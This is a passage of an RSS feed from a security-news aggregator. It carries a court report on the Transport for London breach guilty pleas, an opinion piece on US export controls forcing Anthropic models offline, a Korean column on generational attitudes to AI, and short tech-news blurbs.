<guid isPermaLink="true">https://tsecurity.de/de/3620296/it-security-nachrichten/tfl-hackers-plead-guilty-after-breach-exposed-customer-data-and-cost-29-million/</guid>
<pubDate>Wed, 24 Jun 2026 07:38:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Transport for London cyberattack" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Transport-for-London-cyberattack-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="TfL Hackers Plead Guilty After Breach Exposed Customer Data and Cost £29 Million 1"></p>Two alleged members of the cybercrime collective <a href="https://thecyberexpress.com/scattered-spider-teens-plead-not-guilty/" target="_blank" rel="noopener">Scattered Spider </a>have pleaded guilty to their roles in the <a href="https://thecyberexpress.com/transport-for-london-addressing-cyberattack/" target="_blank" rel="noopener">Transport for London cyberattack</a>, an incident that disrupted services, exposed customer data, and resulted in approximately £29 million in losses and recovery costs for London's transport authority.

The guilty pleas were entered by Thalha Jubair, 20, from East London, and Owen Flowers, 18, from Walsall, West Midlands, on the opening day of proceedings at Woolwich Crown Court. The pair had been due to stand trial on June 22 but changed their pleas to guilty.
<h3><strong>Transport for London Cyberattack Led to Major Disruption</strong></h3>
According to the National Crime Agency (NCA) and City of London Police, TfL's network was infiltrated between August 31 and September 3, 2024. The breach forced all 28,000 employees to attend TfL offices for <a href="https://thecyberexpress.com/top-password-managers-for-digital-safety/" target="_blank" rel="noopener">password</a> resets and caused significant operational disruption across the organization.

The TfL cyberattack also resulted in unauthorized access to <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28805">data</a> held within TfL's Oyster refunds system. The incident affected the authority's customer refund process, delaying reimbursements for some customers. In addition, the application system for Oyster photocards used by children and young people was temporarily shut down.

Authorities <a href="https://nca-newsroom.prgloo.com/news/cyber-criminals-who-hacked-into-transport-for-londons-computer-network-are-convicted" target="_blank" rel="nofollow noopener">said</a> the attack caused substantial financial damage, with TfL reporting losses and recovery costs totaling approximately £29 million.
<h3><strong>Investigation Linked Attackers to Scattered Spider</strong></h3>
Jubair and Flowers were arrested at their homes on September 16, 2024, following a joint investigation conducted by the <a href="https://thecyberexpress.com/nca-arrests-4-for-retail-cyberattacks/" target="_blank" rel="noopener">NCA</a> and City of London Police.

Investigators identified both individuals as members of Scattered Spider, a cybercriminal collective that has been linked to a number of high-profile intrusions.

During searches of Flowers' residence, officers recovered laptops, desktop computers, hard drives, and USB storage devices. Evidence recovered from one Acer laptop included a screenshot showing connectivity to TfL infrastructure.

[caption id="attachment_112868" align="aligncenter" width="600"]<img class="wp-image-112868 size-full" src="https://thecyberexpress.com/wp-content/uploads/TFL-cyberattack-e1782278063737.webp" alt="Transport for London cyberattack" width="600" height="900"> Source: NCA[/caption]

Authorities also found evidence indicating Flowers had accessed an online marketplace that sold breached credentials. Investigators further discovered videos recorded by Flowers that allegedly showed Jubair accessing TfL systems during the attack.

The investigation revealed that the two communicated through <a href="https://thecyberexpress.com/telegram-ban-in-india-ahead-of-neet-re-exam/" target="_blank" rel="noopener">Telegram</a> and collaborated using an online workspace platform that allowed multiple participants to work remotely on shared systems.
<h3><strong>Additional Allegations Involving US Healthcare Networks</strong></h3>
The investigation extended beyond the Transport for London <a class="wpil_keyword_link" href="https://cyble.com/cyberattack/" target="_blank" rel="noopener" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28806">cyberattack</a>. When Flowers was first arrested on September 6, 2024, NCA officers identified evidence suggesting unauthorized activity targeting the networks of SSM Health Care Corporation and Sutter Health in the United States.

Court records show Flowers pleaded guilty to charges related to a conspiracy to conduct unauthorized acts against SSM Health Care Corporation's computer systems with intent to impair operations. He also admitted attempting unauthorized acts against Sutter Health's systems with the same intent.

Jubair additionally faced a charge for failing to disclose PINs or passwords associated with devices seized during the investigation.

Authorities noted that Flowers breached bail conditions on two occasions in March and May 2025.
<h3><strong>Law Enforcement Highlights Impact of Cybercrime</strong></h3>
Paul Foster, Deputy Director and head of the NCA's National <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Cyber Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28803">Cyber Crime</a> Unit, described the case as a lengthy and highly complex investigation. He said the attack demonstrated that <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28804">cybercrime</a> has significant real-world consequences, affecting public services and causing millions of pounds in losses to critical national infrastructure.

Foster also highlighted the growing threat posed by cybercriminal groups operating from the UK and other English-speaking countries, citing Scattered Spider as a notable example.

Deputy Commissioner Nik Adams of the City of London Police said the cyberattack had a significant impact on essential public services and daily operations. He emphasized that individuals responsible for targeting critical organizations and causing financial harm would be pursued through coordinated law enforcement efforts.

The investigation received support from the West Midlands Regional Organised Crime Unit and British Transport Police.

Jubair and Flowers are scheduled to be sentenced at Woolwich Crown Court on July 16.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sky to adapt the scariest 'spine-chilling' podcast of 2025 in immersive new documentary series — and it'll completely change your fears about 'World War 3']]></title>
<description><![CDATA[Sky TV is set to adapt 'spine-chilling' podcast The Wargame in a new immersive docuseries, imagining an Russian-waged war on UK soil.]]></description>
<link>https://tsecurity.de/de/3618287/it-nachrichten/sky-to-adapt-the-scariest-spine-chilling-podcast-of-2025-in-immersive-new-documentary-series-and-itll-completely-change-your-fears-about-world-war-3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618287/it-nachrichten/sky-to-adapt-the-scariest-spine-chilling-podcast-of-2025-in-immersive-new-documentary-series-and-itll-completely-change-your-fears-about-world-war-3/</guid>
<pubDate>Tue, 23 Jun 2026 14:47:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sky TV is set to adapt 'spine-chilling' podcast The Wargame in a new immersive docuseries, imagining an Russian-waged war on UK soil.]]></content:encoded>
</item>
<item>
<title><![CDATA[Trump vs. Anthropic: The AI wars are heating up]]></title>
<description><![CDATA[The US government decision to force Anthropic to close down its latest and greatest AI models, Fable 5 and Mythos 5, was only the next step in a burgeoning battle between AI providers and ignorant politicians. 



Anthropic was on top of the world. Its Mythos 5 LLM had everyone excited. (If you b...]]></description>
<link>https://tsecurity.de/de/3618058/it-nachrichten/trump-vs-anthropic-the-ai-wars-are-heating-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618058/it-nachrichten/trump-vs-anthropic-the-ai-wars-are-heating-up/</guid>
<pubDate>Tue, 23 Jun 2026 13:18:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The US government decision to force Anthropic to close down its latest and greatest AI models, Fable 5 and Mythos 5, was only the next step in a burgeoning battle between AI providers and ignorant politicians. </p>



<p>Anthropic was on top of the world. Its <a href="https://www.computerworld.com/article/4151808/leak-reveals-anthropics-mythos-a-powerful-ai-model-aimed-at-cybersecurity-use-cases-3.html">Mythos 5 LLM</a> had everyone excited. (If you believe the hype, it was kind of scary, too.) Even Anthropic CEO Dario Amodei admitted — or boasted? — that Mythos would bring an <a href="https://www.cnbc.com/2026/05/08/anthropic-mythos-ai-cybersecurity-banks.html" target="_blank" rel="noreferrer noopener">“enormous increase in the amount of vulnerabilities, in the amount of breaches”</a> to us all. But with that fear came the promise of more AI power than ever. </p>



<p>Then, the roof caved in.</p>



<p>On June 12, the US Commerce Department used its export-control powers to demand that <a href="https://www.computerworld.com/article/4185515/anthropics-new-privacy-policy-offers-us-consumers-a-way-around-fable-ban-2.html">Anthropic cut off access to its Fable 5 and Mythos 5 models for all foreign nationals</a>, citing national security concerns and fears of jailbreaks. After figuring out it had no way to do that, Anthropic pulled both of its newest frontier AI models offline worldwide.</p>



<p>Just what an AI company needs! All other Claude models, like the Opus and Sonnet series, remain online. But, come on, AI sales are all about the newest and most powerful models.  </p>



<p>Adding insult to injury — and this is true at many high-tech companies — Anthropic has many employees who aren’t US citizens. This means <a href="https://www.perplexity.ai/search/1bd48d18-3561-43e0-8749-ee6aa304de34" target="_blank" rel="noreferrer noopener">Anthropic’s own programmers can’t work on their latest models.</a></p>



<p>Of course, this isn’t the first time US President Donald J. Trump and company have tried to put a spoke in Anthropic’s wheels. Back in February, Anthropic refused to give Defense Secretary Pete Hegseth <a href="https://www.computerworld.com/article/4138860/anthropic-to-department-of-defense-drop-dead.html">the power to use its models to spy on American citizens</a> and to power autonomous weapons.</p>



<p>This go-around, it wasn’t because Anthropic refused to kowtow to Trump’s officials. It was, they say, out of fear that these new models could be used to attack American interests. </p>



<p>Mind you, no one in Trump’s regime has the tech chops to know just how dangerous, or not, any AI model is. As I recently noted, <a href="https://www.computerworld.com/article/4182531/trumps-new-ai-order-hallucinations-arent-just-for-llms.html">Trump’s AI executive order has no teeth</a>. Nor, more to the point, is there anyone in the administration with a clue about AI.</p>



<p>Specifically, at the Department of Commerce, neither Commerce Secretary Howard Lutnick nor William Kimmitt, undersecretary of commerce for international trade, knows a thing about AI. Just what we need, more political hacks deciding tech policy. </p>



<p>So, how did they discover that Fable and Mythos were theoretically a danger to the US? Good question. According to <em>The Wall Street Journal</em>, it was Amazon CEO Andy Jassy who told the Trump administration <a href="https://www.wsj.com/tech/ai/amazon-ceos-talks-with-u-s-officials-triggered-crackdown-on-anthropic-models-dcc90578" target="_blank" rel="noreferrer noopener">that Fable was untrustworthy</a>. Guess what? AWS offers its own full cloud AI stack, starting with Amazon Bedrock for foundation models, Amazon SageMaker for training and deployment, and a growing set of agentic AI tools and services. </p>



<p>In other words, Amazon is not a neutral party; it’s a competitor. Funny, that.</p>



<p>Sure, Amazon also has partnerships with Anthropic. But, in case you haven’t noticed, all the big AI companies are in bed with each other. That doesn’t stop them from fighting. What’s heating this up is that the AI companies are no longer offering flat-rate subscriptions and are replacing them with far more expensive, <a href="https://www.computerworld.com/article/4185848/how-companies-are-racing-to-solve-the-ai-token-problem.html">token-based pricing schemes</a>. </p>



<p>Armed with this information, Commerce gave Anthropic 90 minutes to fix its “problem.” Right. AI development is fast, but it’s not <em>that</em> fast. In addition, according to Anthropic, officials haven’t spelled out exactly what’s wrong. They only know that Commerce claims there was a “narrow, non‑universal jailbreak” in Fable.   </p>



<p>That’s it. That’s all. </p>



<p>Anthropic has also observed, with reason, that similar jailbreaks are possible on other leading models, like OpenAI’s GPT‑5.5. Those others, however, haven’t been hammered with comparable export controls.</p>



<p>The AI and security experts who do have an AI clue believe Commerce is behaving stupidly. (You won’t get any argument there from me.) For example, in an open letter, “<a href="https://freefable.org/" target="_blank" rel="noreferrer noopener">On Transparent AI Cyber Protections,</a>” they said Commerce’s directive “has taken the best models away from defenders, created market uncertainty, and risked America’s AI leadership without any real risk to justify it,” warning that pulling capabilities “away from defenders without a good reason when our adversaries are rapidly advancing is dangerous.”</p>



<p>Exactly so. </p>



<p>Besides, as Alex Zenla, co-founder and CTO of security company <a href="https://edera.dev/">Edera</a>, observed, Fable’s capability to identify insecure code sections <a href="https://www.linkedin.com/posts/azenla_open-letter-on-transparent-ai-cyber-protections-share-7473414102179160064-gyJy/?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAAAAAKH4BBvA-ZwpVFbaZDTqwLgneEpGsrHQ" target="_blank" rel="noreferrer noopener">is the baseline for any model you’d trust to write secure code.</a> The same capability exists in GPT-5.5, Opus, Sonnet, and Kimi 2.7 — it’s not unique to Fable. Pulling Fable from defenders doesn’t remove the capability from the threat landscape. It just removes it from the people trying to build safer systems.”</p>



<p>This is not about AI safety or security. </p>



<p>What this is really about is opening a new front in Trump’s war against the liberal-leaning Anthropic. Mind you, Anthropic isn’t really liberal. This has more to do with Anthropic not following in other <a href="https://www.citizen.org/news/big-tech-ceos-cozy-up-to-trump/" target="_blank" rel="noreferrer noopener">tech firms’ groveling to Trump</a>. </p>



<p>However, Trump doesn’t seem to realize that by essentially shutting down Anthropic’s biggest move to date, he’s also telling the world that they can’t rely on American AI companies down the road. Sure, in the short run, this hurts Anthropic. In the long run, it’s going to be another reason for Europe and other countries — <a href="https://www.computerworld.com/article/4180801/eu-sets-out-plans-to-reduce-reliance-on-us-cloud-providers.html">taking digital sovereignty seriously</a> — to avoid doing business with any American tech company. </p>



<p>In the meantime, Anthropic and Trump administration officials are in tense talks over whether, and under what safeguards, the models could return to the marketplace. Commerce indicates it might allow a narrower relaunch if jailbreak issues are resolved and additional controls are in place — whatever those might be. </p>



<p>Since it’s really all about massaging Trump’s ego, I’m not feeling terribly optimistic. Just ask Israeli Prime Minister Benjamin Netanyahu how well letting Trump set the terms of engagement goes. <a href="https://www.nytimes.com/2026/06/18/world/middleeast/israel-iran-deal-reaction-netanyahu.html" target="_blank" rel="noreferrer noopener">It’s not pretty</a>. </p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This free tool is helping drivers avoid automatic license plate readers —as fears grow around 'intrusive' new devices that could track your phone, AirPod and smartwatch data]]></title>
<description><![CDATA[Automatic license plate readers are getting worryingly smart, so drivers and privacy advocates are fighting back with a free tool called DeFlock.]]></description>
<link>https://tsecurity.de/de/3616311/it-nachrichten/this-free-tool-is-helping-drivers-avoid-automatic-license-plate-readers-as-fears-grow-around-intrusive-new-devices-that-could-track-your-phone-airpod-and-smartwatch-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616311/it-nachrichten/this-free-tool-is-helping-drivers-avoid-automatic-license-plate-readers-as-fears-grow-around-intrusive-new-devices-that-could-track-your-phone-airpod-and-smartwatch-data/</guid>
<pubDate>Mon, 22 Jun 2026 20:03:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Automatic license plate readers are getting worryingly smart, so drivers and privacy advocates are fighting back with a free tool called DeFlock.]]></content:encoded>
</item>
<item>
<title><![CDATA[칼럼 | X세대의 설렘, Z세대의 불안···AI가 세대를 가르고 있다]]></title>
<description><![CDATA[눈치챘을 수도 있지만, 사람들은 AI를 그다지 좋아하지 않는다. 물론 어떤 환경에 속해 있는지에 따라 차이는 있다. 그러나 각종 설문조사는 AI에 대한 전반적인 인식이 점점 더 부정적으로 변하고 있음을 보여준다. IT 업계 밖의 사람들과 대화를 나누거나 온라인 공간을 둘러봐도 비슷한 분위기를 확인할 수 있다. 오늘날 많은 댓글 창에서 AI는 거의 욕설에 가까운 단어가 됐다.



최근 발표된 한 설문조사는 이러한 분위기를 단적으로 보여준다. 스웨덴인 5명 중 1명은 직장에서 AI를 사용하는 것을 부끄럽게 느낀다고 답했다. 업무...]]></description>
<link>https://tsecurity.de/de/3614541/it-nachrichten/x-z-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614541/it-nachrichten/x-z-ai/</guid>
<pubDate>Mon, 22 Jun 2026 07:33:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>눈치챘을 수도 있지만, 사람들은 AI를 그다지 좋아하지 않는다. 물론 어떤 환경에 속해 있는지에 따라 차이는 있다. 그러나 각종 설문조사는 AI에 대한 전반적인 인식이 점점 더 부정적으로 변하고 있음을 보여준다. IT 업계 밖의 사람들과 대화를 나누거나 온라인 공간을 둘러봐도 비슷한 분위기를 확인할 수 있다. 오늘날 많은 댓글 창에서 AI는 거의 욕설에 가까운 단어가 됐다.</p>



<p>최근 발표된 한 설문조사는 이러한 분위기를 단적으로 보여준다. <a href="https://computersweden.se/article/4183704/var-femte-svensk-kanner-ai-skam-pa-jobbet.html" target="_blank" rel="nofollow">스웨덴인 5명 중 1명</a>은 직장에서 AI를 사용하는 것을 부끄럽게 느낀다고 답했다. 업무 방식을 혁신할 것으로 기대됐던 기술이 오히려 부끄러운 것으로 인식되는 상황을 보면, 직장에서 어떤 대화가 오가고 있을지 어렵지 않게 짐작할 수 있다.</p>



<p>지난주 노동조합 싱크탱크 퓨투리온(Futurion)이 발표한 <a href="https://computersweden.se/article/4180516/svenskarna-ai-kommer-gora-nastan-allt-varre.html" target="_blank" rel="nofollow">AI 인식 보고서</a> 역시 기술 낙관론자들에게는 달갑지 않은 내용이었다. 스웨덴 국민은 AI가 노동시장과 민주주의, 안보 등 거의 모든 영역을 악화시킬 것으로 보고 있었다.</p>



<p><a href="https://futurion.se/wp-content/uploads/2026/06/futurion-x-seismic-rapport-ai-2026-2-juni.pdf" target="_blank" rel="nofollow">해당 조사 결과</a>는 특히 젊은 세대의 불안감이 매우 크다는 점도 보여준다. 학생 10명 중 6명은 일자리가 줄어들고 자신이 가진 지식이 빠르게 구식이 될 수 있다는 <a href="https://www.theguardian.com/technology/2026/may/26/students-boo-pro-ai-graduation-speakers" target="_blank" rel="nofollow">우려 속</a>에서 미래의 직장 생활을 두려워하고 있는 것으로 나타났다.</p>



<p>국제 조사에서도 비슷한 결과가 확인된다. 올해 4월 <a href="https://www.waltonfamilyfoundation.org/about-us/newsroom/gen-z-resentment-toward-ai-grows-as-adoption-stagnates-and-workplace-fears-mount" target="_blank" rel="nofollow">미국 갤럽이 실시한 조사</a>에 따르면 Z세대는 AI에 대해 점점 더 큰 분노와 불안을 느끼고 있다. 반면 열정과 낙관론은 약화되는 추세다. 최근에는 AI를 긍정적으로 평가한 유명 졸업식 연설자들에게 학생들이 야유를 보내는 영상이 확산되기도 했다.</p>



<p>동시에 AI 개발에 대한 또 다른 형태의 물리적 저항도 나타나고 있다. 신규 데이터센터 건설에 반대하는 움직임이 그것이다. 현재는 주로 미국에서 벌어지고 있지만, 머지않아 스웨덴에서도 비슷한 현상이 나타날 가능성이 높다.</p>



<p>이 같은 현상에는 여러 이유가 있다. 중요한 단서는 지난해 봄 발표된 <a href="https://hai.stanford.edu/ai-index/2026-ai-index-report/public-opinion#:~:text=5.%20AI%20experts%20and%20the%20U.S.%20public%20have%20very%20different%20perspectives%20on%20AI%27s%20future%2C%20except%20on%20elections%20and%20personal%20relationships." target="_blank" rel="nofollow">스탠퍼드대학교의 AI 관련 보고서</a>에서 찾을 수 있다. 이 보고서는 AI 전문가와 일반 대중의 AI 인식 차이를 분석했는데, 기술 업계 종사자와 일반 시민 사이의 간극이 매우 큰 것으로 나타났다.</p>



<p>이 같은 차이는 AI 공급업체가 대중의 참여 없이 기술 발전을 주도해 온 데서 비롯됐다. 누군가는 AI를 ‘동의 없이 도입된 기술’이라고 표현했는데, 상당히 정확한 지적이다. AI는 어느새 업무와 여가, 문화, 인간관계 등 거의 모든 영역에 스며들고 있다. 그것도 대부분 사람들이 원하거나 요청하지 않은 방식으로 말이다. AI에 대한 피로감과 반감이 커지는 것은 어쩌면 자연스러운 결과다.</p>



<p>무엇보다 이러한 간극은 AI 기업과 AI 지지자들이 자신들의 메시지가 어떤 인상을 주고 있는지 제대로 이해하지 못한 데서 비롯됐다. 정작 AI 업계 사람들은 AI의 위험성을 가장 적극적으로 이야기해 왔다. AI가 일자리를 대체할 것이라고 경고하고, 변화에 적응하지 못하면 뒤처질 것이라고 말한다. 그러면서 동시에 AI를 놀라운 기술이라고 홍보한다. 사람들이 혼란을 느끼고 두려움을 갖게 되는 것은 당연한 일이다.</p>



<p>그렇다면 AI의 장점으로 무엇이 강조되고 있을까. 물론 많은 사람이 챗GPT를 활용하고 AI로 사진을 보정하는 기능을 좋아한다. 하지만 그 외에 AI에 대한 기대와 열정의 상당 부분은 업무 효율성과 생산성 향상에 집중돼 있다. 그리고 바로 이 지점에서 AI 옹호자와 기업 경영진이 대중의 정서를 제대로 읽지 못하고 있다고 생각한다.</p>



<p>물론 내 판단이 틀릴 수도 있다. 그러나 적어도 내가 보는 세상에서 대부분의 사람들은 어떤 대가를 치르더라도 업무 효율을 높이는 것에 의해 동기부여를 받지 않는다. 사람들을 움직이는 것은 기업의 수익성이 아니라 자신이 오랜 시간 쌓아온 지식과 전문 역량을 인정받으며 활용하고, 그 과정에서 자부심과 만족감을 얻는 것이다.</p>



<p>생산성 향상이 급여 인상으로 이어진다면 중요한 동기가 될 수 있다. 하지만 지금까지는 그런 모습이 뚜렷하게 나타나지 않고 있다. 오히려 많은 사람은 AI 활용이 자신의 일자리와 전문성을 결국 대체하기 위한 첫 단계라고 받아들이는 분위기다.</p>



<p>이러한 우려의 상당 부분은 아직 두려움의 영역에 속한다. 거시적 관점에서 볼 때 AI가 노동시장에 미친 영향은 지금까지 제한적이었다. 그러나 구조조정 소식이 늘어나고 초급 직무가 점점 줄어들면서, 특히 젊은 세대를 중심으로 불안감이 커지고 있다.</p>



<p>세대 간 인식 차이도 분명하게 드러난다. 특히 링크드인에서 기술에 가장 열광하는 사람들은 대체로 필자를 포함한 X세대 이상이다. 반면 틱톡 댓글 공간에서 만나는 젊은 세대는 훨씬 더 부정적인 반응을 보인다.</p>



<p>물론 이는 링크드인 특유의 긍정적이고 낙관적인 분위기 때문이기도 하다. 하지만 더 근본적으로는 기성세대가 AI를 수십 년 동안 약속돼 온 기술 발전과 미래의 실현으로 받아들이고 있기 때문이라고 생각한다. 영화에서 보고 책에서 읽었던 미래가 마침내 현실이 되고 있다는 감각이다. 말 그대로 미래가 도착한 것이다.</p>



<p>반면 젊은 세대에게 AI는 정반대의 의미를 갖는다. 오늘날 청년들은 성장 과정 내내 금융위기와 팬데믹, 그리고 현재의 글로벌 불안정까지 끊임없는 위기를 경험해 왔다. 그리고 현재 그들의 상황은 결코 낙관적이지 않다.</p>



<p>AI가 본격적으로 확산되기 직전 실시된 <a href="https://www.hhs.se/sv/om-oss/news/sse/2026/ny-studie-stor-klyfta-i-lycka-mellan-unga-vuxna-och-aldre-i-sverige/" target="_blank" rel="nofollow">조사에 따르면</a>, 스웨덴의 고령층은 세계에서 가장 행복한 집단 가운데 하나였다. 반면 젊은 세대는 삶의 만족도와 삶의 의미, 경제적 안정성 측면에서 고령층보다 낮은 평가를 내렸다. 그럼에도 미래에 대한 기대와 낙관론은 매우 높은 수준이었다.</p>



<p>그런데 오픈AI 설립자 샘 알트만이 등장해 그 밝은 미래가 더 이상 젊은 세대만의 것이 아닐 수도 있다고 말하기 시작했다.</p>



<p>최근에는 “AI는 마케팅 문제를 안고 있다”는 이야기가 나오고 있다. 어느 정도는 맞는 지적이다. 현재 AI를 둘러싼 담론은 기대감보다 불안감을 더 크게 자극하고 있기 때문이다. 그 책임은 AI 기업에만 있는 것이 아니다. 정치인과 기업 경영진, 관리자, AI 지지자들 역시 구체적이고 공감할 수 있는 방식으로 소통하지 못하면서 미래에 대한 신뢰보다 불확실성과 불안감을 키우고 있다.</p>



<p>이 상황을 바꿀 수 있는 유일한 방법은 명확성이라고 생각한다. 기술의 장점과 단점에 대한 명확성, AI가 할 수 있는 것과 할 수 없는 것에 대한 명확성, 무엇에 활용해야 하고 무엇에는 활용하지 말아야 하는지에 대한 명확성, 우리가 원하는 결과와 원하지 않는 결과에 대한 명확성, 그리고 무엇보다 자신이 알고 있는 것과 알지 못하는 것을 구분하는 명확성이 필요하다.</p>



<p>대부분의 사람은 AI가 미래 사회의 중요한 일부가 될 것이라는 점에는 동의한다. 남은 질문은 단 하나다. 그 미래가 어떤 모습일지, 그리고 우리가 어떻게 그 미래를 가능한 한 더 밝게 만들어 갈 수 있을지에 대한 것이다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-06-21 18h : 2 posts]]></title>
<description><![CDATA[2 posts were published in the last hour 15:9 : Haldwani Cyber Fraud: ₹2.5 Lakh Stolen Without OTP, Raising Bank Security Concerns 15:9 : Bitcoin Drops Below $60,000 as Market Selloff and Security Fears Weigh on Crypto
Read more →
The post IT Security News Hourly Summary 2026-06-21 18h : 2 posts a...]]></description>
<link>https://tsecurity.de/de/3613831/it-security-nachrichten/it-security-news-hourly-summary-2026-06-21-18h-2-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613831/it-security-nachrichten/it-security-news-hourly-summary-2026-06-21-18h-2-posts/</guid>
<pubDate>Sun, 21 Jun 2026 18:10:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>2 posts were published in the last hour 15:9 : Haldwani Cyber Fraud: ₹2.5 Lakh Stolen Without OTP, Raising Bank Security Concerns 15:9 : Bitcoin Drops Below $60,000 as Market Selloff and Security Fears Weigh on Crypto</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-21-18h-2-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-21-18h-2-posts/">IT Security News Hourly Summary 2026-06-21 18h : 2 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bitcoin Drops Below $60,000 as Market Selloff and Security Fears Weigh on Crypto]]></title>
<description><![CDATA[  Falling further now, Bitcoin dipped under $60,000 again – the first time since early 2024 – amid softness across financial markets and rising unease about digital safety. Around $59,909, it lost close to 6% in one session, almost 18.5%…
Read more →
The post Bitcoin Drops Below $60,000 as Market...]]></description>
<link>https://tsecurity.de/de/3613771/it-security-nachrichten/bitcoin-drops-below-60000-as-market-selloff-and-security-fears-weigh-on-crypto/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613771/it-security-nachrichten/bitcoin-drops-below-60000-as-market-selloff-and-security-fears-weigh-on-crypto/</guid>
<pubDate>Sun, 21 Jun 2026 17:24:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Falling further now, Bitcoin dipped under $60,000 again – the first time since early 2024 – amid softness across financial markets and rising unease about digital safety. Around $59,909, it lost close to 6% in one session, almost 18.5%…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/bitcoin-drops-below-60000-as-market-selloff-and-security-fears-weigh-on-crypto/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/bitcoin-drops-below-60000-as-market-selloff-and-security-fears-weigh-on-crypto/">Bitcoin Drops Below $60,000 as Market Selloff and Security Fears Weigh on Crypto</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA["I was one of the biggest skeptics on the team": An original Xbox founder says the fears they had in 2001 are coming back stronger than ever]]></title>
<description><![CDATA[Original Xbox pioneer Laura Fryer warns that soaring hardware costs and AI shortages are reviving 25-year-old fears.]]></description>
<link>https://tsecurity.de/de/3612095/windows-tipps/i-was-one-of-the-biggest-skeptics-on-the-team-an-original-xbox-founder-says-the-fears-they-had-in-2001-are-coming-back-stronger-than-ever/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612095/windows-tipps/i-was-one-of-the-biggest-skeptics-on-the-team-an-original-xbox-founder-says-the-fears-they-had-in-2001-are-coming-back-stronger-than-ever/</guid>
<pubDate>Sat, 20 Jun 2026 12:55:20 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Original Xbox pioneer Laura Fryer warns that soaring hardware costs and AI shortages are reviving 25-year-old fears.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sugar Season 2 Episode 1 Is Out Now on Apple TV]]></title>
<description><![CDATA[Sugar season 2 is now streaming on Apple TV, bringing Colin Farrell back as private detective John Sugar for another stylish mystery in Los Angeles. The new season begins with Sugar taking on a new missing-persons case while still searching for his missing sister, giving the story a more personal...]]></description>
